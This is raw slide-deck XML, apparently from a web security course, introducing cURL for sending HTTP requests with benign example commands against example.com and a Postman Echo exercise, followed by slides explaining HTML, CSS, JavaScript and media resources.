            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034" name="Google Shape;1034;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="13578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513375" y="172339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513375" y="2086936"/>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513375" y="24504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513375" y="326659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513375" y="364629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513375" y="402599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a:off x="513375" y="4419736"/>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cURL Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="Google Shape;1240;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="606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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>cURL is a command-line utility for sending HTTP requests. In security, it's used to:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;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2" name="Google Shape;1242;p72"/>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Test that web server security configurations are functional</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p72"/>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Ensure that web servers don't leak sensitive data through HTTP responses</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p72"/>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Verify that servers only respond to certain request types</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1245" name="Google Shape;1245;p72"/>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Search for vulnerabilities in the web server</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1" name="Google Shape;1251;p7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latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>cURL </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C232"/>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cURL Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1257" name="Google Shape;1257;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8" name="Google Shape;1258;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="914075"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="▪"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>`curl example.com`</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="▪"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>`curl -v example.com`</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="▪"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>`curl -I example.com`</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="▪"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>`curl --request GET --url example.com`</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="▪"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>`curl --help`</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>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7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264" name="Google Shape;1264;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5" name="Google Shape;1265;p7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cURL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the cURL command to send different types of HTTP requests to Postman Echo.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Instructions sent via Slack. </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1" name="Google Shape;1271;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2607800" y="3425000"/>
            <a:ext cx="39537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cURL</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7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Client-Side Resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1277" name="Google Shape;1277;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1" name="Shape 1281"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Google Shape;1282;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369213" y="4159596"/>
            <a:ext cx="468900" cy="304200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="073763"/>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83" name="Google Shape;1283;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Client-Side Resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1284" name="Google Shape;1284;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Many kinds of data are transferred over the web:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1285" name="Google Shape;1285;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6" name="Google Shape;1286;p78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021500" y="1284250"/>
            <a:ext cx="8122800" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="182875" spcFirstLastPara="1" rIns="0" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Structure &amp; Content</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: the code used to define the structure and content of a web page</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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 sz="1800">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Looks and Layout</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>CSS Stylesheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>describe the appearance and layout of web pages</a:t>
            </a:r>
            <a:endParaRPr sz="1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1800">
                <a:solidFill>
                  <a:srgbClr val="BF9000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interaction and Behavior</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="BF9000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>allows us to create interactive pages that update dynamically</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="073763"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Rich Media and Resources</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="07376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rPr>
              <a:t>Such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>images, videos, and audio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700" strike="sngStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cat videos and procrastination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the distribution of arbitrary content over the Internet.</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="073763"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1287" name="Google Shape;1287;p78"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="448775" y="3104489"/>
            <a:ext cx="468900" cy="656850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1288" name="Google Shape;1288;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="493775" y="1360575"/>
            <a:ext cx="378900" cy="588600"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd fmla="val 41810" name="adj"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448775" y="1682450"/>
            <a:ext cx="468900" cy="142800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="E0666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HTML</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1290" name="Google Shape;1290;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="493775" y="2174600"/>
            <a:ext cx="378900" cy="588600"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd fmla="val 41810" name="adj"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448775" y="2496475"/>
            <a:ext cx="468900" cy="142800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:srgbClr val="6AA84F"/>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900">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="Google Shape;1292;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448763" y="4287046"/>
            <a:ext cx="468900" cy="304200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="0B5394"/>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mp3</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1293" name="Google Shape;1293;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308613" y="4086746"/>
            <a:ext cx="468900" cy="304200"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="3D85C6"/>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a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>jpeg</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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1299" name="Google Shape;1299;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0" name="Google Shape;1300;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="828375"/>
            <a:ext cx="43185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2400">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>RAW HTML</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1301" name="Google Shape;1301;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262525" y="828375"/>
            <a:ext cx="43185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2400"/>
              <a:t>RENDERED</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1302" name="Google Shape;1302;p79"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262525" y="1025525"/>
            <a:ext cx="0" cy="33993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303" name="Google Shape;1303;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="808650" y="1345575"/>
            <a:ext cx="3005995" cy="3418675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1304" name="Google Shape;1304;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4918770" y="1345575"/>
            <a:ext cx="3005995" cy="341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CSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1310" name="Google Shape;131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80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="828375"/>
            <a:ext cx="43185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2400">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>RAW CSS</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1312" name="Google Shape;1312;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262525" y="828375"/>
            <a:ext cx="43185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2400">
                <a:latin typeface="Nunito SemiBold"/>
                <a:ea typeface="Nunito SemiBold"/>
                <a:cs typeface="Nunito SemiBold"/>
                <a:sym typeface="Nunito SemiBold"/>
              </a:rPr>
              <a:t>CSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Nunito SemiBold"/>
                <a:ea typeface="Nunito SemiBold"/>
                <a:cs typeface="Nunito SemiBold"/>
                <a:sym typeface="Nunito SemiBold"/>
              </a:rPr>
              <a:t>RENDERED</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Nunito SemiBold"/>
              <a:ea typeface="Nunito SemiBold"/>
              <a:cs typeface="Nunito SemiBold"/>
              <a:sym typeface="Nunito SemiBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1313" name="Google Shape;1313;p80"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4262525" y="1025525"/>
